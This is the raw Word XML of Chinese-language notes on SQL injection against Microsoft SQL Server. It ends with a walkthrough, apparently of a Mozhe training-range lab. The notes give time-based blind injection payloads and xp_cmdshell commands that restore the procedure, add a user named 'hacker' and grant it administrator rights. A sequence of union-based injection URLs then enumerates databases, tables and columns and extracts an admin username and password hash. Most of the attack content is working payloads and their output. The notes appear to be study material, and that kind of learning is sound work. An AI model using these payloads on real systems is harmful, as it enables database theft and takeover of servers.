    <w:p w14:paraId="203DFE1C" w14:textId="260C0450" w:rsidR="00A14128" w:rsidRDefault="00A14128" w:rsidP="00A14128"/>
    <w:p w14:paraId="23CDE785" w14:textId="77777777" w:rsidR="00F90FB1" w:rsidRPr="00D53C32" w:rsidRDefault="00F90FB1" w:rsidP="00F90FB1">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时间注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D37A3B9" w14:textId="77777777" w:rsidR="00F90FB1" w:rsidRDefault="00F90FB1" w:rsidP="00F90FB1">
      <w:r>
        <w:t>http://192.168.130.137/1.aspx?id=1;if (select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0:5'—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A90B1D8" w14:textId="5E1D83A9" w:rsidR="00F90FB1" w:rsidRDefault="00055621" w:rsidP="00F90FB1">
      <w:r>
        <w:t>;if (select count(.) from sysobjects)&gt;0 WAITFOR DELAY '0:0:5'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0389CE" w14:textId="13B37510" w:rsidR="00F90FB1" w:rsidRDefault="00F90FB1" w:rsidP="00F90FB1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F90FB1">
        <w:rPr>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>http://192.168.130.137/1.aspx?id=1;if (ascii(substring((select top 1 name from master.dbo.sysdatabases),1,1)))&gt;1 WAITFOR DELAY '0:0:5'</w:t>
      </w:r>
      <w:r w:rsidR="006B6474">
        <w:rPr>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6390E801" w14:textId="77777777" w:rsidR="00F22085" w:rsidRPr="00F22085" w:rsidRDefault="00F22085" w:rsidP="00F220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85">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>;if(0=(SelEct%1eis_srvrolemember('sysadmin'))) WaItFOR%1edeLAY%1e'0:0:5'%1e --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E528C5" w14:textId="77777777" w:rsidR="00F22085" w:rsidRPr="00F22085" w:rsidRDefault="00F22085" w:rsidP="00F220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85">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>;if(0=(SelEct%1eis_srvrolemember('db_owner'))) WaItFOR%1edeLAY%1e'0:0:5'%1e --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1F2D2B" w14:textId="669E98CA" w:rsidR="006B6474" w:rsidRPr="00F22085" w:rsidRDefault="006B6474" w:rsidP="00F90FB1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29389DE0" w14:textId="4A2C2D42" w:rsidR="006B6474" w:rsidRDefault="006B6474" w:rsidP="006B6474">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r w:rsidRPr="006B6474">
        <w:t>XP_CMDSHELL检测：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD120B5" w14:textId="6E5DD0A5" w:rsidR="000C7A30" w:rsidRPr="000C7A30" w:rsidRDefault="00BB3AB0" w:rsidP="000C7A30">
      <w:hyperlink r:id="rId114" w:history="1">
        <w:r w:rsidR="000C7A30">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>http://zone.secevery.com/article/1065</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0C9B875F" w14:textId="6E5AF3D1" w:rsidR="00BA50A6" w:rsidRPr="00BA50A6" w:rsidRDefault="00BB3AB0" w:rsidP="00BA50A6">
      <w:hyperlink r:id="rId115" w:history="1">
        <w:r w:rsidR="00BA50A6">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://www.lagou.com/lgeduarticle/38721.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6EB88CDD" w14:textId="23A4CEAE" w:rsidR="00225A5F" w:rsidRDefault="00BB3AB0" w:rsidP="00225A5F">
      <w:hyperlink r:id="rId116" w:history="1">
        <w:r w:rsidR="00225A5F" w:rsidRPr="00067C95">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://www.cnblogs.com/cnjava/archive/2012/06/13/2547524.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7D3C7A24" w14:textId="77777777" w:rsidR="00225A5F" w:rsidRPr="00225A5F" w:rsidRDefault="00225A5F" w:rsidP="00225A5F"/>
    <w:p w14:paraId="3A94C016" w14:textId="3AF1C484" w:rsidR="006B6474" w:rsidRDefault="00BB3AB0" w:rsidP="006B6474">
      <w:hyperlink r:id="rId117" w:history="1">
        <w:r w:rsidR="006B6474" w:rsidRPr="00067C95">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://www.cnblogs.com/vigarbuaa/p/3371500.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="30886E09" w14:textId="57ADCB53" w:rsidR="006B6474" w:rsidRDefault="006B6474" w:rsidP="006B6474"/>
    <w:p w14:paraId="415E046C" w14:textId="486EF8B7" w:rsidR="006A0058" w:rsidRPr="006A0058" w:rsidRDefault="006A0058" w:rsidP="006B6474">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A0058">
        <w:rPr>
          <w:rFonts w:ascii="FangSong" w:eastAsia="FangSong" w:hAnsi="FangSong" w:hint="eastAsia"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="0F1516"/>
        </w:rPr>
        <w:t>看下目标的xp_cmdshell存储过程是否还在,主要是想看它有没有被删掉,你也可以用这种方式来查询其它你想知道的任何存储过程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2FCE24" w14:textId="207C6BCA" w:rsidR="006A0058" w:rsidRPr="006A0058" w:rsidRDefault="006A0058" w:rsidP="00E534A0">
      <w:r w:rsidRPr="006A0058">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="CC7832"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="006A0058">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006A0058">
        <w:rPr>
          <w:rStyle w:val="number"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="6897BB"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="006A0058">
        <w:t xml:space="preserve">=(select count(*) from master..sysobjects where xtype = </w:t>
      </w:r>
      <w:r w:rsidRPr="006A0058">
        <w:rPr>
          <w:rStyle w:val="string"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="6A8759"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>'x'</w:t>
      </w:r>
      <w:r w:rsidRPr="006A0058">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006A0058">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="CC7832"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="006A0058">
        <w:t xml:space="preserve"> name = </w:t>
      </w:r>
      <w:r w:rsidRPr="006A0058">
        <w:rPr>
          <w:rStyle w:val="string"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="6A8759"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>'xp_cmdshell'</w:t>
      </w:r>
      <w:r w:rsidRPr="006A0058">
        <w:t>) --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0D642D" w14:textId="77777777" w:rsidR="006B6474" w:rsidRPr="006B6474" w:rsidRDefault="006B6474" w:rsidP="006B6474">
      <w:r w:rsidRPr="006B6474">
        <w:t>;exec master..xp_cmdshell 'dir c:\'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C90F54" w14:textId="77777777" w:rsidR="006B6474" w:rsidRPr="006B6474" w:rsidRDefault="006B6474" w:rsidP="006B6474">
      <w:r w:rsidRPr="006B6474">
        <w:t>修复XP_CMDSHELL：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445DE275" w14:textId="77777777" w:rsidR="006B6474" w:rsidRPr="006B6474" w:rsidRDefault="006B6474" w:rsidP="006B6474">
      <w:r w:rsidRPr="006B6474">
        <w:t>;exec master.dbo.sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C56D48" w14:textId="77777777" w:rsidR="006B6474" w:rsidRPr="006B6474" w:rsidRDefault="006B6474" w:rsidP="006B6474">
      <w:r w:rsidRPr="006B6474">
        <w:t>用XP_CMDSHELL添加用户hacker：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10FE47A3" w14:textId="77777777" w:rsidR="006B6474" w:rsidRPr="006B6474" w:rsidRDefault="006B6474" w:rsidP="006B6474">
      <w:r w:rsidRPr="006B6474">
        <w:t>;exec master.dbo.xp_cmdshell 'net user hacker 123456 /add'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060F01F3" w14:textId="77777777" w:rsidR="006B6474" w:rsidRPr="006B6474" w:rsidRDefault="006B6474" w:rsidP="006B6474">
      <w:r w:rsidRPr="006B6474">
        <w:t>XP_CMDSHELL把用户hacker加到ADMIN组：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CA7091" w14:textId="77777777" w:rsidR="006B6474" w:rsidRPr="006B6474" w:rsidRDefault="006B6474" w:rsidP="006B6474">
      <w:r w:rsidRPr="006B6474">
        <w:t>;exec master.dbo.xp_cmdshell 'net localgroup administrators hacker /add'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594D215F" w14:textId="77777777" w:rsidR="006B6474" w:rsidRPr="006B6474" w:rsidRDefault="006B6474" w:rsidP="006B647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585D24" w14:textId="77777777" w:rsidR="006B6474" w:rsidRPr="006B6474" w:rsidRDefault="006B6474" w:rsidP="00F90FB1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="360E33E6" w14:textId="797BE0DC" w:rsidR="00D53C32" w:rsidRDefault="00D53C32" w:rsidP="00C51675">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>墨者案例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206E4C10" w14:textId="65747EC9" w:rsidR="00E13132" w:rsidRPr="00E13132" w:rsidRDefault="00E13132" w:rsidP="00E13132">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>普通注入方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E90BED" w14:textId="2AC6C1F8" w:rsidR="00D53C32" w:rsidRPr="00D53C32" w:rsidRDefault="00D53C32" w:rsidP="00D53C32">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100" w:beforeAutospacing="1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kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>order by 2 成功；order by 3 失败； order by 4 成功；order by 5 失败 说明列数位于 3-4之间。查找回显点</w:t>
      </w:r>
      <w:r w:rsidRPr="00D53C32">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D53C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10234B" wp14:editId="4296B5BC">
            <wp:extent cx="5274310" cy="25755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4111" w14:textId="77777777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kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>id=2 and 1=2 union all select null,null,null,null；挨个替换null 发现 select null,2,null,null 页面出现回显。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627BE4F7" w14:textId="5B89D4EF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026DBF3" wp14:editId="76D16E85">
            <wp:extent cx="5274310" cy="25704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D5FC" w14:textId="77777777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kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>查找所在库名称添加： ?id=2 and 1=2 union all select 1,(select db_name()), '3', 4 找到数据库名称。 提示：这里也可以使用db_name(1)、db_name(2)等查询其他数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1D00DC" w14:textId="17F2343E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D0BBBE" wp14:editId="6D169F82">
            <wp:extent cx="5274310" cy="26835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C95F" w14:textId="77777777" w:rsidR="00D53C32" w:rsidRPr="00D53C32" w:rsidRDefault="00D53C32" w:rsidP="00D53C32">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100" w:beforeAutospacing="1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kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>查找数据库表名称：?id=2 and 1=2 union all select 1,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype = 'U'),'3',4 提示: xtype='U' 为 用户表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5805FF" w14:textId="545765D9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BF1FEC" wp14:editId="00583E37">
            <wp:extent cx="5274310" cy="24472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E23A" w14:textId="77777777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kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>?id=2 and 1=2 union all select 1,(select top 1 col_name(object_id('manage'),1) from sysobjects),'3',4 替换 col_name(object_id('manage'),1) 中的1 依次为 2，3，4查出所有列名。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F595B4" w14:textId="79A51646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38678C" wp14:editId="03EEC26A">
            <wp:extent cx="5274310" cy="27038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CA92" w14:textId="6DF32B01" w:rsid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kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>查取数据: ?id=2 and 1=2 union all select 1,(select top 1 username from manage),'3',4 获取用户名；?id=2 and 1=2 union all select 1,(select top 1 password from manage),'3',4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C5C4F8" w14:textId="52221E75" w:rsidR="00C51675" w:rsidRDefault="00C51675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F74979" w14:textId="7C0BE6FF" w:rsidR="00C51675" w:rsidRDefault="00C51675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A9D193" w14:textId="60D9E7DD" w:rsidR="00E13132" w:rsidRDefault="00E131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2A1060B" w14:textId="16719809" w:rsidR="00E13132" w:rsidRDefault="00E131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E2420D" w14:textId="4EA21A87" w:rsidR="00E13132" w:rsidRDefault="00E13132" w:rsidP="00E13132">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>特殊注入方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE3C953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表明返回为空</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAF4360" w14:textId="6F899CCF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5305/new_list.asp?id=2 union all select null,null,'text',null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B8ABFE" w14:textId="6BC168E4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A5A26E" wp14:editId="0D896A58">
            <wp:extent cx="8890" cy="88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552F46" wp14:editId="2C4FFDD9">
            <wp:extent cx="5274310" cy="17754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FB3F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5305/new_list.asp?id=2 and 1=0 union all select 1,'title','context',2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E75A721" w14:textId="7B8C8B54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037E0C" wp14:editId="6088CF7B">
            <wp:extent cx="8890" cy="88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078899" wp14:editId="20C6DBD7">
            <wp:extent cx="5274310" cy="13595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97F2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1250/new_list.asp?id=2 and 1=0 union all select 1,system_user,@@version,2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3966FB87" w14:textId="1CF929BC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102156" wp14:editId="23EB8279">
            <wp:extent cx="8890" cy="88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DBAC38" wp14:editId="424F8F17">
            <wp:extent cx="5274310" cy="18211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3100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lastRenderedPageBreak/>
        <w:t>http://219.153.49.228:41250/new_list.asp?id=2 and 1=0 union all select 1,system_user,db_name(),2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A80A75D" w14:textId="0B786BD3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6AC13B" wp14:editId="634C918B">
            <wp:extent cx="8890" cy="88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83A297" wp14:editId="2820D1C8">
            <wp:extent cx="5274310" cy="12357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76DE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所以获取到当前数据库为</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715A2BEA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mozhe_db_v2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B53A738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当前用户为</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4342E8E2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mozhe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78ED0243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数据库版本是</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377CAE37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Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) Oct 14 2005 00:33:37 Copyright (c) 1988-2005 Microsoft Corporation Express Edition on Windows NT 5.2 (Build 3790: Service Pack 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453440C8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（5）测试权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A61978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1250/new_list.asp?id=2/is_srvrolemember('sysadmin')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2BB7C7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返回正常，说明用户属于sysadmin组，即有sysadmin权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B364D6C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9135/new_list.asp?id=2/(case when (system_user='sa') then 1 else 0 end)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D44FE79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报错</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE36AC8" w14:textId="487893EC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015080" wp14:editId="1232F89F">
            <wp:extent cx="8890" cy="88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7A0995" wp14:editId="26D9010D">
            <wp:extent cx="4184015" cy="1043940"/>
            <wp:effectExtent l="0" t="0" r="6985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5A30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lastRenderedPageBreak/>
        <w:t>http://219.153.49.228:49135/new_list.asp?id=2/(case when (system_user='mozhe') then 1 else 0 end)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D84D3FB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返回正常</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC51747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（6）加号的使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331AE97E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%2B是+的编码，url中不能直接使用，否则会别解析为空格</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7C536D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9135/new_list.asp?id=2 and 1=0 union all select 1,system_user%2B'|'%2Bdb_name(),@@version,2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E994F77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翻译成为</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8A8463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9135/new_list.asp?id=2 and 1=0 union all select 1,system_user+'|'+db_name(),@@version,2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F05A30F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把（5）中的两个改成+的模式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664D28CD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9135/new_list.asp?id=2%2B(case when (system_user='sa') then 1 else 0 end)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39231CB6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9135/new_list.asp?id=2%2B(case when (system_user='mozhe') then 1 else 0 end)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13113C99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9135/new_list.asp?id=1%2B1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174E8231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（7）枚举出所有数据库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E545A7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3884/new_list.asp?id=2 and 1=0 union all select 1,system_user%2B'|'%2Bdb_name(),name,2 from master..sysdatabases </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BADE5D2" w14:textId="3A38B72F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CE4CC1" wp14:editId="3A03AE0B">
            <wp:extent cx="8890" cy="88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6367BA" wp14:editId="5367C6ED">
            <wp:extent cx="5274310" cy="12782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6E13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3884/new_list.asp?id=2 and 1=0 union all select 1,system_user%2B'|'%2Bdb_name(),name,2 from master..sysdatabases where name not in('master')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C99F01" w14:textId="18B65EF9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8F00D1" wp14:editId="730EC55C">
            <wp:extent cx="8890" cy="88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1F3F3F" wp14:editId="0809F150">
            <wp:extent cx="5274310" cy="12573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A382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按照上面方法，直到报错</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBE8A44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3884/new_list.asp?id=2 and 1=0 union all select 1,system_user%2B'|'%2Bdb_name(),name,2 from master..sysdatabases where name not in('master','model','mozhe_db_v2','msdb','tempdb')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CB3CF4" w14:textId="5570EB31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CA2E40" wp14:editId="731DB335">
            <wp:extent cx="8890" cy="88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5D2956" wp14:editId="47A52770">
            <wp:extent cx="5274310" cy="24809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25D8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即得到所有的数据库为：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722EBB10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'master','model','mozhe_db_v2','msdb','tempdb'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CB4EBA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（8）枚举出目标库的所有表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6397D710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3884/new_list.asp?id=2 and 1=0 union all select 1,system_user%2B'|'%2Bdb_name(),name,2 from mozhe_db_v2..sysobjects where xtype='U'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53226212" w14:textId="34EC7785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407AB25" wp14:editId="1A150EFB">
            <wp:extent cx="8890" cy="88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3DA1A6" wp14:editId="5B916E01">
            <wp:extent cx="5274310" cy="12649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1D89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3884/new_list.asp?id=2 and 1=0 union all select 1,system_user%2B'|'%2Bdb_name(),name,2 from mozhe_db_v2..sysobjects where xtype='U' and name not in('manage')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038EF82D" w14:textId="351936F5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6F5D36" wp14:editId="7FD54DDE">
            <wp:extent cx="8890" cy="88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57966B" wp14:editId="5BDF9D42">
            <wp:extent cx="5274310" cy="13411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7CF0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3884/new_list.asp?id=2 and 1=0 union all select 1,system_user%2B'|'%2Bdb_name(),name,2 from mozhe_db_v2..sysobjects where xtype='U' and name not in('manage','announcement')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326CCB92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报错，结束</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CA655A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即得到所有的表名为</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799EE1D8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'manage','announcement'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4B057E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（9）枚举出表的字段名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1E8D83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3884/new_list.asp?id=2 and 1=0 union all select 1,system_user%2B'|'%2Bdb_name(),b.name,2 from mozhe_db_v2..sysobjects a, mozhe_db_v2..syscolumns b where a.xtype='U' and a.id=b.id and a.name='manage'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B27B328" w14:textId="222A7513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324A62" wp14:editId="573B8A03">
            <wp:extent cx="8890" cy="88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5C5E55" wp14:editId="04540B01">
            <wp:extent cx="5274310" cy="10731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D3D4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3884/new_list.asp?id=2 and 1=0 union all select 1,system_user%2B'|'%2Bdb_name(),b.name,2 from mozhe_db_v2..sysobjects a, mozhe_db_v2..syscolumns b where a.xtype='U' and a.id=b.id and a.name='manage' and b.name not in('id','username','password')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699B6519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报错，结束</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09825E4E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即得到表manage的字段名为：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6968913A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'id','username','password'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B98556E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同理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E12445D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3884/new_list.asp?id=2 and 1=0 union all select 1,system_user%2B'|'%2Bdb_name(),b.name,2 from mozhe_db_v2..sysobjects a, mozhe_db_v2..syscolumns b where a.xtype='U' and a.id=b.id and a.name='announcement' and b.name not in('id','title','contents','times')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD570BD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得到表announcement的字段名为：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7052CB0A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'id','title','contents','times'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33442A4E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（10）查询出需要的数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5917CCEC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3523/new_list.asp?id=2 and 1=0 union all select 1,system_user%2B'|'%2Bdb_name()%2B'|'%2Busername,password,2 from mozhe_db_v2..manage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011D6ABB" w14:textId="5369572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9B965A" wp14:editId="619CB219">
            <wp:extent cx="8890" cy="88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E3F2BB" wp14:editId="55DE5EC6">
            <wp:extent cx="5274310" cy="1066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381C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lastRenderedPageBreak/>
        <w:t>http://219.153.49.228:43523/new_list.asp?id=2 and 1=0 union all select 1,system_user%2B'|'%2Bdb_name()%2B'|'%2Busername,password,2 from mozhe_db_v2..manage where username not in ('admin_mz')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31398282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报错，结束</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06508F98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发现只有这一行记录 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA16FF1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admin_mz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B505374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72e1bfc3f01b7583</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054A4547" w14:textId="77777777" w:rsidR="00164D08" w:rsidRDefault="00164D08" w:rsidP="00A14128">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>宽字节注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5064C0" w14:textId="77777777" w:rsidR="00921670" w:rsidRPr="00921670" w:rsidRDefault="00921670" w:rsidP="00921670">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42209DD7" wp14:editId="78542C1A">
            <wp:extent cx="5274310" cy="19424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D6D1" w14:textId="77777777" w:rsidR="00164D08" w:rsidRPr="00164D08" w:rsidRDefault="00164D08" w:rsidP="00164D08">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="502CC9F8" wp14:editId="614D17EB">
            <wp:extent cx="4400550" cy="32289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EB31" w14:textId="77777777" w:rsidR="00164D08" w:rsidRDefault="00164D08" w:rsidP="00164D08">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C11736A" w14:textId="77777777" w:rsidR="00164D08" w:rsidRDefault="00164D08" w:rsidP="00164D08">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4485A7B0" w14:textId="77777777" w:rsidR="00164D08" w:rsidRDefault="00164D08" w:rsidP="00164D08">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="567EE048" w14:textId="77777777" w:rsidR="00164D08" w:rsidRDefault="00164D08" w:rsidP="00164D08">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C6EFFB9" w14:textId="77777777" w:rsidR="00164D08" w:rsidRDefault="00164D08" w:rsidP="00164D08">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="295546AF" w14:textId="77777777" w:rsidR="00164D08" w:rsidRDefault="00164D08" w:rsidP="00164D08">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
